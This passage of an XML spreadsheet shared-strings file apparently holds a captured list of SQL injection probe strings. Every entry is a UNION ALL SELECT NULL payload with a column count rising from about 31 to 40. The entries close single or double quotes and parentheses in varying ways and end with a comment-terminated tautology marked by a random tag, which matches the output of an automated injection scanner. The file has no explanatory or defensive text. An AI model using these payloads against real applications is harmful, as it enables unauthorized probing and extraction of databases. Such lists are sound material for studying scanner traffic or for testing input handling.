    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gEMT' LIKE 'gEMT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'sKzp' LIKE 'sKzp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'xoxK' LIKE 'xoxK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vkSe' LIKE 'vkSe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'oOcR' LIKE 'oOcR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'dfao' LIKE 'dfao</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'AdAd' LIKE 'AdAd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'BnwR' LIKE 'BnwR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hbGN' LIKE 'hbGN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'QyCd' LIKE 'QyCd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'DSHN' LIKE 'DSHN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'OZBG' LIKE 'OZBG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'HJyx' LIKE 'HJyx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'BLRZ' LIKE 'BLRZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'MrWT' LIKE 'MrWT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SCLQ' LIKE 'SCLQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wQjn' LIKE 'wQjn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'AxDE' LIKE 'AxDE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'LQfV' LIKE 'LQfV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'PcxV' LIKE 'PcxV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'yeYl' LIKE 'yeYl</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'dnSy' LIKE 'dnSy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'MlhN' LIKE 'MlhN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'SaDs' LIKE 'SaDs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'tBcG' LIKE 'tBcG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'GnxU' LIKE 'GnxU</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'uQvO' LIKE 'uQvO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'GyyG' LIKE 'GyyG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KJXQ' LIKE 'KJXQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "ttfX" = "ttfX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "AWRo" = "AWRo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "hhyx" = "hhyx</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "KVVF" = "KVVF</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "dWAP" = "dWAP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "DZog" = "DZog</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "mpyj" = "mpyj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "aPyE" = "aPyE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "yVrA" = "yVrA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vvhm" = "vvhm</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "KrAN" = "KrAN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "nSXV" = "nSXV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VPBl" = "VPBl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Zsdc" = "Zsdc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bIzS" = "bIzS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "wfdj" = "wfdj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "lkRd" = "lkRd</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jRsH" = "jRsH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "sYKu" = "sYKu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "DJMM" = "DJMM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "atMA" = "atMA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "pRrG" = "pRrG</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "JLdp" = "JLdp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "NLRg" = "NLRg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "qCcs" = "qCcs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "crCN" = "crCN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "IEvG" = "IEvG</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ftzJ" = "ftzJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "seRm" = "seRm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "wxoz" = "wxoz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "RFOw" = "RFOw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kxEg" = "kxEg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "padq" = "padq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "hnUI" = "hnUI</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "JvyN" = "JvyN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "vBko" = "vBko</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "qexK" = "qexK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "hNNg" = "hNNg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "noqg" = "noqg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Fsfr" = "Fsfr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "IzyH" LIKE "IzyH</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "wLqZ" LIKE "wLqZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "gFAI" LIKE "gFAI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "gQEz" LIKE "gQEz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "fGal" LIKE "fGal</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "hQBJ" LIKE "hQBJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "yZtg" LIKE "yZtg</t>
  </si>
  <si>
